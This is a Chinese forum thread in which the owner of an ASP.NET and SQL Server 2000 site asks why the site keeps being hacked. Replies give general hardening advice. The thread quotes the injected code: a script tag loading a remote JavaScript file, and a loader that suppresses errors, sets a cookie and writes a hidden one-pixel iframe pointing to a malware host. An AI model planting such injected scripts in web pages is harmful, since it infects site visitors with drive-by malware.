asp.net(2.0)c# + Sql server2000 开发的网站近期一直被黑,也不知道是什么原因,前一段时间是被挂马,今天又被黑了。其中有一个网页的原代码有问题:<head>
<title>The 'src' property had a malformed URL: '~/TradePic/2008529145517.jpg"></title><script src=http://1.cool0.biz/1.js></script><!--' is not a valid virtual path..</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.er {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>请问这个是什么原因??网址:www.honghai56.com
<title>The 'src' property had a malformed URL: '~/TradePic/2008529145517.jpg"></title><script src=http://1.cool0.biz/1.js></script><!--' is not a valid virtual path..</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.er {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>请问这个是什么原因??网址:www.honghai56.com
如果服务器端 aspx里面有恶意的代码,说明服务器 安全要好好检查一下了。
看你服务器是什么,一般是 server2003 把,然后可以用 google baidu 搜 "server 2003安全",可以找到很多的。 按找到的设置,及时打上补丁,还有 SQL的安全,其实 都可以在网上找到。按找到的资料 设置后 可以挡住 大部分的攻击,现在都是些 用工具攻击的人。
把机器上全部的htm,aspx,js文件全部加上了那一句,汗死后来杀毒,清理文件,弄了好些日子估计楼主也中毒了。
document.writeln("<base onmouseover=\"window.status=\'完毕 \';return true\">");
document.writeln("<SCRIPT LANGUAGE=\"JavaScript\"> ");
document.writeln("<!-- Hide ");
document.writeln("function killErrors() { ");
document.writeln("return true; ");
document.writeln("} ");
document.writeln("window.onerror = killErrors; ");
document.writeln("\/\/ --> ");
document.writeln("<\/SCRIPT>");
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 1*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie101ab2="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie101ab2=risb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http://pp.cool0.biz/bmw/am7.htm?cool\" width=1 height=1><\/IFRAME>");
document.write("<div style=\"display:none\">");
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/642888\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/642888\/ystat.gif\"\/><\/a><\/noscript>");
}
}Get();
我估计原因主要是我们在设sql server2000密码时设的太弱了。